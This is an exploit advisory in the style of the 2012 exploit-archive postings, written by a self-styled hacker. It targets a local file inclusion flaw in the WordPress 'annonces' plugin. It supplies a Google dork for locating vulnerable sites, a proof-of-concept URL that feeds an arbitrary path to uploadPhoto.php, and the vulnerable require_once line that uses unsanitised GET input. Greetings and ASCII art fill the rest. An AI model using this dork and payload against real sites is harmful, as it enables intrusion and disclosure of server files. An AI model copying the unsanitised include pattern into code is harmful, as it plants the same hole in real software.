+----------------------------------------------------------------------+
# Exploit Title: wordpress annonces plugin local file inclusion LFI
# Google Dork: inurl:wp-content/plugins/annonces
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Greetz: Milw0rm 1337day.com
# Software Link: http://wordpress.org/extend/plugins/annonces/download/
____ (_) ____ ___
( _ \| |( _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_| |_|
_
(_) ____ ____ ____ _____
| | / __| / __| \__ \ / ` \
| | \___ \ \___ \ / _ \_ | Y Y \
|_| |____/ |____/ (___ / |_|_| /
\/ \/
+----------------------------------------------------------------------+
[+] p0c : http://[SERVER]/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?mainPluginFile=[Lfi]
[+] vulnerable code : require_once($_GET['mainPluginFile']);
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
<3 jendoubi ahmed ; s-man ; chaouki mkachakh & ; Sohaieb Azaiez ;
&&&& --Geni ryodan-- ;)
[+] profile : www.facebook.com/TN.spl0it3r
mAhna mAhna
+----------------------------------------------------------------------+